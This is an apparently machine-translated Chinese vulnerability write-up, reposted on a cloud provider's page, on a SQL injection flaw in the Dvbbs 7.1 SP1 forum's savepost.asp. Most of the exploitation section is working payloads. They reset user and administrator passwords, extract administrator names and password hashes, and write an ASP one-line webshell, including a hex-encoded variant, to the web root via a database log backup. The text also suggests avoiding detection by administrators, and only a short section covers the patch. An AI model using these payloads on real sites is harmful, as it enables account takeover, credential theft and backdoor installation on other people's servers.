Dvbbs7.1 SP1 SQL version savepost.asp injection Vulnerability analysis, utilization and prevention _ vulnerability research

Source: Internet
Author: User
Tags sql injection administrator password
I. Overview
Vulnerability Description:
Http://coolersky.com/leak/programme/bbs/2006/0515/515.html
A few days ago to listen to Hak_ban said someone put dvbbs7 a leak to release out, has never had time to see, the afternoon with Edward asked for a link to look at:
http://www.eviloctal.com/forum/read.php?tid=22074
This site is:
Http://coolersky.com/articles/hack/analysis/programme/2006/0515/238.html
Look at the analysis of the prodigal son, feel that has been analyzed quite understand, but the group still have a few friends do not understand, simply in the local environment test loopholes, thanks to Keng provider, oh, really lazy to go online to find.
Second, vulnerability analysis
Since it issavepost.asp The problem of the program, then open the change file, the prodigal son has been mentioned is toolsbuyuser parameter filtering, then look at this variable.
32 lines, defining variables:
Private Getposttype,tomoney,usetools,toolsbuyuser,getmoneytype,tools_usetools,tools_lastposttime,toolsinfo, Toolssetting
111 Lines, empty
Toolsbuyuser = ""
120 lines, in ParameterGetposttype is 0 o'clock, assign value
Toolsbuyuser = "0| | | $SendMoney "
123 lines, in ParameterGetposttype is 1 o'clock, assign value
Toolsbuyuser = "0| | | $GetMoney "
139 lines, in ParameterGetposttype is 2 o'clock, assign value
Toolsbuyuser = "0@@@" &Buy_Orders& "@@@" &Buy_VIPType& "@@@" &Buy_UserList& "| | $PayMoney | | | "
747 lines, defining SQL
Sql= "INSERT INTO" &TotalUseTable& "(Boardid,parentid,username,topic,body,dateandtime,length,rootid,layer, Orders,ip,expression,locktopic,signflag,emailflag,isbest,postuserid,isupload,isaudit,ubblist,getmoney,usetools , Postbuyuser,getmoneytype) VALUES ("&Dvbbs.boardid&", "&ParentID&", ' "&username&", ' "& topic& "', '" &Content& "," "&DateTimeStr&" ', ' "&dvbbs.strlength (Content) &", "& rootid& "," &ilayer& "," &iorders& "," &Dvbbs.UserTrueIP& "', '" &expression (1) & "' , "&locktopic&", "&signflag&", "&mailflag&", 0, "&Dvbbs.userid&", "&ihaveupfile & ", &IsAudit&", ' "&UbblistBody&", "&ToMoney&", ' &UseTools& ', ' "& toolsbuyuser& "'," &GetMoneyType& ")"
745 lines, executing SQL
Dvbbs.execute (SQL)
We see that the Toolsbuyuser parameters are not securely filtered during the entire process of obtaining data to commit, resulting in SQL injection vulnerabilities.
third, loophole utilization
1,Registered User Coolersky
2, choose to publish a new topic
3, in "Select the type of posts" selected "Forum trading posts Set"

4, in the "Can buy user list limit:" Write
' Modify your user password to 123456
Coolersky ', 0); update dv_user set userpassword= ' 49ba59abbe56e057 ' where username= ' Coolersky ';--
After modifying the password, login to the forum, if the use of 123456 successful landing, then the vulnerability has not been patched.
5, access to the front desk administrator username and password, respectively, placed in a custom avatar and signature, view the user Coolersky basic information can be seen.
Coolersky ', 0); Update dv_user set userface= (select top 1 username from Dv_user where userclass= ' Administrator '), usersign= (select top 1 userpassword from Dv_user where userclass= ' admin ' where username= ' Coolersky ';--
6. Get admin username and password
Coolersky ', 0); Update dv_user set userface= (select top 1 username to dv_admin), usersign= (select top 1 password from Dv_ad min) where username= ' Coolersky ';--
7, through the log to view the background management password
Coolersky ', 0); Update dv_user set usersign= (select L_content from Dv_log where l_content like '%password2% ') where username = ' Coolersky ';--
8, get the name of the database
Coolersky ', 0); Update dv_user set userface= (select Db_name ()) where username= ' Coolersky ';--
9. Log differential backup Webshell
' Replace dbname for the database name obtained in the previous step, log differential backup to db_owner permissions!
' Replace d:\web\dvbbs7\ for current forum physical path, how to get don't ask me!
Coolersky ', 0); ALTER DATABASE dbname set RECOVERY full;create table Temptt (a image); backup log dbname to disk = ' C:\acool_ Back ' and Init;insert into TEMPTT (a) VALUES (' <%execute request ("L")%> '), BACKUP log dbname to disk = ' D:\web\dvbbs 7\temptt.asp ';d ROP table Temptt;alter database dbname set RECOVERY simple;--
Or
Coolersky ', 0); ALTER DATABASE dbname set RECOVERY full;create table Temptt (a image); backup log dbname to disk = ' C:\acool_ Back ' and Init;insert into TEMPTT (a) values (0x273c2565786563757465207265717565737428226c2229253e27); BACKUP log dbname to disk = ' d:\web\dvbbs7\temptt.asp ';d ROP table Temptt;alter database dbname set RECOVERY simple;--
Use the minimum ASP Trojan Client connection can be!
10, directly modify the admin password
Through 5, 6, 73 steps to get the administrator before and after the user name and password, at least the password is 16-bit MD5, we can through the network query or brute force to get the administrator password to log in before and after the station, but also very likely not be able to crack export orders.
And if you can not get the forum's physical path, then have to modify the administrator password to achieve, of course, can not change the administrator password or try to avoid changes, or immediately be the administrator know was invaded.
(1) Get the user name of front desk administrator:
Coolersky ', 0); Update Dv_user Set userface= (select top 1 username from Dv_user where userclass= ' Administrator ') where username= ' test ';--
(2) Modify the front desk Administrator password:
' Suppose we get the front desk admin username admin, change password to 123456
Coolersky ', 0); update dv_user set userpassword= ' 49ba59abbe56e057 ' where username= ' admin ';--
(3) Get admin username:
Coolersky ', 0); Update Dv_user Set userface= (select top 1 username from dv_admin) where username= ' test ';
(4) Modify the background Administrator password:
' Suppose we get the admin admin username and change the password to 123456
Coolersky ', 0); update dv_admin set password= ' 49ba59abbe56e057 ' where username= ' admin ';--
(5) Login to the foreground upload MDB constructed asp a word back door, backend for ASP or ASA file, how to operate not in this article described in the process.
By doing so, we can do more with the database as long as the server supports multiple statements.
Iv. Vulnerability Fixes
1, download the latest patch from Dvbbs
Http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1
2, opensavepost.asp file, will be 747 lines
Sql= "INSERT INTO" &TotalUseTable& "(Boardid,parentid,username,topic,body,dateandtime,length,rootid,layer, Orders,ip,expression,locktopic,signflag,emailflag,isbest,postuserid,isupload,isaudit,ubblist,getmoney,usetools , Postbuyuser,getmoneytype) VALUES ("&Dvbbs.boardid&", "&ParentID&", ' "&username&", ' "& topic& "', '" &Content& "," "&DateTimeStr&" ', ' "&dvbbs.strlength (Content) &", "& rootid& "," &ilayer& "," &iorders& "," &Dvbbs.UserTrueIP& "', '" &expression (1) & "' , "&locktopic&", "&signflag&", "&mailflag&", 0, "&Dvbbs.userid&", "&ihaveupfile & ", &IsAudit&", ' "&UbblistBody&", "&ToMoney&", ' &UseTools& ', ' "& toolsbuyuser& "'," &GetMoneyType& ")"
modified to:
Sql= "INSERT INTO" &TotalUseTable& "(Boardid,parentid,username,topic,body,dateandtime,length,rootid,layer, Orders,ip,expression,locktopic,signflag,emailflag,isbest,postuserid,isupload,isaudit,ubblist,getmoney,usetools , Postbuyuser,getmoneytype) VALUES ("&Dvbbs.boardid&", "&ParentID&", ' "&username&", ' "& topic& "', '" &Content& "," "&DateTimeStr&" ', ' "&dvbbs.strlength (Content) &", "& rootid& "," &ilayer& "," &iorders& "," &Dvbbs.UserTrueIP& "', '" &expression (1) & "' , "&locktopic&", "&signflag&", "&mailflag&", 0, "&Dvbbs.userid&", "&ihaveupfile & ", &IsAudit&", ' "&UbblistBody&", "&ToMoney&", ' &UseTools& ', ' "& Dvbbs.checkstr (Toolsbuyuser) & "", "&GetMoneyType&") "
The DVBBS.CHECKSTR function is used to filter the Toolsbuyuser content.
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.